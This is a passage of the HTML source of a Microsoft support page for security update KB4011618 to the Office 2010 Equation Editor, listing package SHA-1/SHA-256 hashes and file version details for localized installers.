width=\"494\"><p>3a7aa16e-4a72-477b-8aca-4d5abb0e3b3c<span lang=\"EN-US\"></span></p></td></tr></tbody></table><h2>More Information</h2><h3>Security update replacement information</h3><p>This security update replaces\u00a0<a href=\"https://support.microsoft.com/help/2553204\" managed-link=\"\">KB2553204</a></p><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\"><span><span><span>security update deployment information: November 14, 2017</span></span></span></a></p><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p><h2>File hash information</h2><table class=\"table\"><tbody><tr><th>Package name</th><th>Package hash SHA 1</th><th>Package hash SHA 2</th></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ar-sa.exe</td><td>59E1467141F90F1FA287994E8652CE4547578F01</td><td>76405545FA37ED084E6BC0C724B9BF86C25F4F5981B06D14E9D469A7D892AA63</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-bg-bg.exe</td><td>451B9668D76DEDC69AE8B539C3BB84190930382F</td><td>76595A8042E4AACA37FD5BCEFB093A445F9DB50588A1AAF4A47B618A5833062C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-cs-cz.exe</td><td>DD01290B53034BF7AD5671262BA0A46407BF856C</td><td>B57E3581EA4F485A75D70F807CBB4629963968A26F4217EC191386E824F86A2A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-da-dk.exe</td><td>2D3747C972898DE66A6265A4C11464D96E78C06D</td><td>D9605A308191D6F29765A53FA797EDA212AB97A72D8C91C385A9371D5FBC3C45</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-de-de.exe</td><td>7078E576C7C6C9FE6534DF2D576D533D1AD75AE0</td><td>1840B0F7178971BA1E1E692A0E205B5198C2BC798509A95AF98F5C039E62513B</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-el-gr.exe</td><td>F01CCB25F33FAE6CBE715833651BCC22B9D21EE1</td><td>9E985401B3A48FDB18AE838D833FB1FB630B5BAA9324BD53C36B19FF87697B1E</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-en-us.exe</td><td>36DABF913D3F092DDE2458AD38A87D67DA492072</td><td>D441DD983E40F81CFCFF3181220BAEE025D4B6957A7B62277B684EFF49523824</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-es-es.exe</td><td>48A2F5F31338F81AC5E2A76838465D79862B0447</td><td>1FC9603851348661E8AAA0026310BD5EFD6715A2ADA2A3598172E54215FFC592</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-et-ee.exe</td><td>093500F1A3834F3814382BE08A3EB9B6E8F9DF47</td><td>E3977A0ECC44CF2D213AA08C1B2DAAF826853BAB2BB3F03F2CC1014B748BA824</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-fi-fi.exe</td><td>0C8BF127095AC290AFDFEB0B7A6BEE20A70CFC5B</td><td>15779B184A7EA47E3BDAD9297ADE77475CCFB60F52B565777B79AF20260184BF</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-fr-fr.exe</td><td>971999DCB683B75FF0DDD6A451295EBD7CA83149</td><td>70718FCF5C73C6E1E8EA88A00675E7D6A81CA816C117E6162B14691A710E5487</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-he-il.exe</td><td>E915952623DE5988C6000AD74D4C6942DCDE8656</td><td>04059D9E936009972E2BD58FCDDD1D68B13705E12381321092899697B0DB90F7</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-hi-in.exe</td><td>35DFB0BB09BF1C214505C023CC8876503554D943</td><td>9BB2A74642984D49E5A7CFB970A3A73AD3C48BD6399E122E92F1861EA01FED37</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-hr-hr.exe</td><td>1C155D4FB0F69FCDBBBA283B6AF1589141677127</td><td>A0A2BBF48BD30A115ED23EC4BE24AB2AB79E9813F71369B64DACCFE11B44B4D9</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-hu-hu.exe</td><td>8611B82C873D9DFC44267AB4D5BA3BFF9014004A</td><td>3EFF9198D75EA3F257C05BC10B837F7D7F741C45A7681A3BE452DAE1781F368D</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-it-it.exe</td><td>F54ED16E66AAE078255219D0FCAB3322B5FFF91A</td><td>3B14C39E77819F2F78E331495166A309182AF153195DAABEC3D322E6BE3666F5</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ja-jp.exe</td><td>887811D8E6A90223DA819E9C5BEB121CF0D1F6B4</td><td>3399E1FEA06B872DCACD26DA0B1A34BED2A38000B38C66356DD07EA01A1C8040</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-kk-kz.exe</td><td>9C16FCBD5CD765038D201137B10895879744335E</td><td>8C6ADDE77D4D2E7431D29C6CBC155EFF51DF046C70553C853CE6E5FFE6CDE5A1</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ko-kr.exe</td><td>B79A0DA26BB378BD3BF90FED71B0CB8BBBCDDC51</td><td>64205370DE896124FEECD638A40855D997F26851137D09FA6418C7B52055F6C8</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-lt-lt.exe</td><td>DAB97AEF6566C8C2A9CE270593ECBEE7706C8A15</td><td>9310F3814C1B06C107B50AB4FE3AA894F2CED97355FCD05B93CE9058CB050D5D</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-lv-lv.exe</td><td>E1ACCA14132110F67D85467E5013D1BC80577D89</td><td>8B12954856CFCAC46FB4A97B8759B96ED566722C0B754863ECFE15B6FCAB395C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-nb-no.exe</td><td>1B3E54758F9BC540DA71E8C94C7DD75FC7A9E3E5</td><td>87AE7BAF291697D02717A18A53BCA56EC971436021097A15A65E749A06D3D5DA</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-nl-nl.exe</td><td>9AC48A233453E283E00C1FE77F0E26A6A2BE7537</td><td>F0B93BE2FC004C95114104F65805026A97DD139BA0F75CA7AFC9ADC6CCF76540</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-pl-pl.exe</td><td>503EA5BDC3C91680489322461109163F100B27DB</td><td>0B2D427A2DA9A57F40208E3A0402766CDDE6EEE9019FB74E09F00A758DCE2623</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-pt-br.exe</td><td>BBD645D66CC040090C1505AA06381049B77F3055</td><td>1A77E3D22A1FA94B4B498E82A64CFC8C3AEF4962F64FD7F34E0EC375B4047ED1</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-pt-pt.exe</td><td>C2104B99090916314754B600665B79DAB1639B4B</td><td>FBB5B3D597D350DE633DA801975413EDCB0C51BC3276AAE2C6882B19EDA146F0</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ro-ro.exe</td><td>17F63000291C55ECB9F8D266E07CA3F3B99AF91A</td><td>1E8E0BEC7CC8FD424CE87BAE084F8FB3EB6045BD95856563949D271E9891610F</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ru-ru.exe</td><td>9F3A7056E839CF4E1137493C3514D848AD2DDC4F</td><td>94D29A0218D53257B5D00AF87F69AD05E1DCA506D4AE5D51DCD32BE59834FB71</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sk-sk.exe</td><td>2A1EADCBF98E50175E1BE9DD7940FAB9F49A629E</td><td>554244AB6E7E10A7580F3D446E47FEAE85A4722DA530313D5ACB5BD2C0482177</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sl-si.exe</td><td>EC6E77441662AD207FD7026602B04F85D0C32FAE</td><td>AAE96522DF0EA4B3796CC51EDBBBD42AEB804706968986C0572E61416ED8A063</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sr-latn-cs.exe</td><td>A2CE588D1DE0DE6E2485E6572B7AAB96106E754C</td><td>630F6E5922672C5F866BCD09A61A9DAF92D987AAC3B25B0B83FC78EC701F57AF</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sv-se.exe</td><td>25D6A6D341E8D764018D69039B01DC57D896CFD0</td><td>64C3EF670DA02EEB477E16662B0BAB0E24054F348C7462D356CF82BEE374E736</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-th-th.exe</td><td>39342821C3D117804BC158DA4CDB92DE3CE5F4D9</td><td>9C6B8FE50A9111D3DE22E8897B1AA56498D7C68A7FFD6216BB01D0F56D81176A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-tr-tr.exe</td><td>5F501995026722A6DB1EAAA0B83CC2A7231326CD</td><td>B3271CECA9AD212B3435BF4F97A1E292B53A91B4A7235B259F5CE53327152006</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-uk-ua.exe</td><td>30E1828C66ECAAB1CAACA8C7362B5241D639E4EE</td><td>D4F2287B04ACA3CFDD94770DBD410E1EA5FFE83684997E751A640F376860987C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-zh-cn.exe</td><td>32ADD39324AF87A10A70F1F73BC61CDECFC7E7B4</td><td>3FFCBA2C30648ADD343E62636291B1DD341F32E5458A1AE6709EF80434AB3EE1</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-zh-tw.exe</td><td>B8DC90008177017CD34FD29B7B4F5FBC2E0EC0AA</td><td>CBEC6F0D36155BCF3D2E4AA2D857EAFA3CA323EA4A7027A956B95AA7AAC42BE0</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ar-sa.exe</td><td>A044BC142F8D695D3164A7C0F6A4760D01DBA663</td><td>2D54409F99170157E011D1EC2339F65DDF002D16B5F37C9C3998A944B4E27C8C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-bg-bg.exe</td><td>638823B68FD6FF2E7B5252109394A752073ED2C6</td><td>2056B8BC886717DE4B4C1A34558D41C2A8AB92BEEFD7260D1917E61CDA1EF257</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-cs-cz.exe</td><td>1E5C2C7C63D545AE6839796871F032956F723BE9</td><td>5CA9CCBEE029BFBA0DB16B3889760028C6BBD5049B22D653FCB02CE514AE1A34</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-da-dk.exe</td><td>81B3516B787CD933FE01FB11F147592952E5899D</td><td>1A0F4B28C19E5CF6C8F5F428D26FDF139F15948FBC33F365F2631F1411947243</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-de-de.exe</td><td>FC424F2D5E7C111697091F82658CAB280774F14C</td><td>CD873FC1B48E30AC3B9A6DA952C6882A963300365A44F8C8DDA4032432F5898A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-el-gr.exe</td><td>723A17BE82B8AE7CF1B4BE1AB8CF9F7B946023DC</td><td>30282A49E3B390A3A325357820C1AD447A8F2E4AF430A82A50D62C1BDAD6DA4E</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-en-us.exe</td><td>0D04B56BE33B9DD3DF6149CB55E29990AD764F2D</td><td>DB9CB1C80F4AFDE5F852946D258040DB42D47D5258524D279D79A76AAAA16DAD</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-es-es.exe</td><td>68F0B54AA83256D58E617DC63EE28F564639FF14</td><td>D2EA3FE8D84596CE278BFFB6B3A8593515EB3B7941DB1334450014160628E870</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-et-ee.exe</td><td>8C368752DB8E4C7945A1B5A1ADC2F7B6EE9F76DC</td><td>2D4A0146E2B629C8F89DE965723F783D7ABB9BFFE13974E5C6947232C185D401</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-fi-fi.exe</td><td>5F6D036FE4DBB66D352F928B462D59A58B6D13B7</td><td>F1897B570D70822DFA8812454AAEFCC6770CDB73186BA6D8262C6E8A9C3E7531</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-fr-fr.exe</td><td>8501902B0F9EBE4E63FAF83F977195FB67F296CA</td><td>BB8677B0A2B73ED8A03408A7F6E14B6E714A20C64A9E08FDE3139E32CCAC7714</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-he-il.exe</td><td>650BF0033D58EC14A9A9643848EB3901BBAC0975</td><td>014305F7CBDA595C989B9355FF6845BA77C0A57FC537D79F51DB62D2F806B1F3</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-hi-in.exe</td><td>667893DF4DB4C308CEE6EBAAAF536143ADB5BD75</td><td>60D3CD80A2DFF472422C7DAEFAEBA1E89964FAD24558092919DE3B05120FE132</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-hr-hr.exe</td><td>00F6FBF5D8E292CE10B63DED8B097CE6E2B60319</td><td>A7E6CE428B0EC8B8B4A737D1EDAB3E9C553B12D4A182F635339A7DB956C33B88</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-hu-hu.exe</td><td>2E883ED146C3851A826F762C80E0195AF9095CD8</td><td>D10289C57D60B41A3D7298DC46DBAAB0B386B4EE3E056E21681B879A41E05BB6</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-it-it.exe</td><td>DD7822ED4E65AA5BEB192AD4308DFDBCD74E006E</td><td>F2720040D02298E5475CCFBD64DBC4F47E1229225ECBB52F354B1D7ADE1ABAFC</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ja-jp.exe</td><td>820DD332C83F6A4536BA56549BF2CDB49EE21ED5</td><td>418DBCADD9D0102ADE59628B04BF4B2035856F92FEF5AA41B3F5F7878153FD23</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-kk-kz.exe</td><td>7E180393FEECFCEF9D6D187D667798A564B51ECE</td><td>A10245848B7236EAF1921A3FFAB700A6851AE2A5ED9C0F7D6A0027B95F5F6A36</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ko-kr.exe</td><td>A56A1D221D97C689BC1B0B9B4B6F025E9B24058E</td><td>216A262DE0E394DE6FE8382D1F6C200F44DD65FB5A8C2A4054EDCAAA0CA12614</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-lt-lt.exe</td><td>05DCA752D2A3365A6A802FA80EC6D0003CD66203</td><td>FD498D244A2071268E97425A8157BAF8C22E7F3306131597F3EDD45868E2CD43</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-lv-lv.exe</td><td>7AF3237394C03CD41998EDA6095C252A389A13FA</td><td>9839E8BE00B8DF4B21775E0195BD310E351E463ECAAFE78B3DDD22DED3F95ACF</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-nb-no.exe</td><td>2B1251DB11B4BF548FD077070BCC07CA84FD36F1</td><td>AFE6B1AAFD5F538B274B8296A9931C2956B87C13CEA0D1BD0B8892C0864123D9</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-nl-nl.exe</td><td>9F9C17851FF19FBB54193EFF66336A55F3A5D718</td><td>11AD22183223D9BFA51621B0ABE2C3B806A6159910309F80281A655418CB634C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-pl-pl.exe</td><td>F2EC8832FEA1EDEDED4AB8928882E422E91B81A3</td><td>011DCC759E26874093C91D7E855BDAB6152BEF21E2D99A2EE24E5D0C96313919</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-pt-br.exe</td><td>A58430F4B109B606AB27B8FE71FD84C02E11D82C</td><td>26CF8F23A3AA270B62B303AB930235DF8E908B0B15D23BC06841C559DFE89DC5</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-pt-pt.exe</td><td>C0E91D030D79A5D94AEBA078591A70D870B4701A</td><td>48C97738174AFF3A6B0A9848BF8C8906F342057B86CAC0114DD9BAB71DBD939D</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ro-ro.exe</td><td>9842AA3C6AC426D8784F79DA5878CE1D90A1E02A</td><td>819F7D7DACF85A67250308E4A84B8424DD5164AC3B27C8B9339118746D472F5A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ru-ru.exe</td><td>8F16BED370ED6F5DE15B28B8212DAB7D30FF2D9F</td><td>E9E86D024840CF29B8078458F5CA7564292457DD29A6732CA19B6A466A735156</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sk-sk.exe</td><td>D1F041AB16B0C0FB9AF22374BE280B85CD91DB2F</td><td>7D90049677AAC8AC56FCEAA32B9C472DF9DC77C2C5E8D87FA0D63F43EADB24EB</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sl-si.exe</td><td>8E23C12C534CF7A05FC050F761073734D336791E</td><td>3F17B71960E126DEE3AE4EA3957D222862A0EC1D3CD02F2D80CD2275B879B469</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sr-latn-cs.exe</td><td>898568DF9D0EC495EB9EAC104F45FF5317F11BE7</td><td>35F59E51E88EDB025CF8FCE6884D9CF60573DB13F3090860256CD1AE1F12806F</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sv-se.exe</td><td>CD07A211A67362D8757569173AA9BFE35D251482</td><td>CB4D8B5B4A0C9CAFA5FF727D631A2564C3329F9FCC92AE94519B17054ECF85B0</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-th-th.exe</td><td>A06860238BD978CDF96231B42FC048B052FFA4F5</td><td>C03359C71EA08361B65AD6159C2A04143F74F65A3877516E0F870A4290A37C2B</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-tr-tr.exe</td><td>E2D3BB0EAAC40FC5B41CD005064BCC24F02BD53A</td><td>37CB8D8DB5FF283B96073C557EB9D007A72547FF03FFA759536C60C758973F12</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-uk-ua.exe</td><td>188E5BA4609375CBA3202CD7DC14782096A68FD9</td><td>3F865C92075F71B433A646845A2B1D1B5C5F05F34E2A8CE1AA11E8B1EF2B3722</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-zh-cn.exe</td><td>82377EE5E7EE118CC318413BADA037AB6F119EC1</td><td>25B7D366E223F117710B29346263AA4881C3CF7C27CE7B40B2B2C2CACD40AD89</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-zh-tw.exe</td><td>0817B8440F8B05E62A433745703803AB1CA08C61</td><td>990D3C5BC9D1DE12480E2F418C667380B10E8150E40D08725B45C91A9B8E7693</td></tr></tbody></table><h2>File Information</h2><p>The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h3>For all supported x86-based versions of Office 2010</h3><table class=\"table\"><tbody><tr height=\"21\"><td height=\"21\" width=\"131\"><strong>File identifier</strong></td><td width=\"104\"><strong>File name</strong></td><td width=\"88\"><strong>File version</strong></td><td width=\"93\"><strong>File size</strong></td><td width=\"72\"><strong>Date</strong></td><td width=\"73\"><strong>Time</strong></td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1025</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1026</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1028</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1029</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1030</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1031</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1032</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1033</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1035</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1036</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1037</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1038</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1040</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1041</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1042</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1043</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1044</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1045</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1046</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1048</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1049</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1050</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1051</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1053</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1054</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1055</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1058</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1060</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1061</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1062</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1063</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1081</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1087</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" 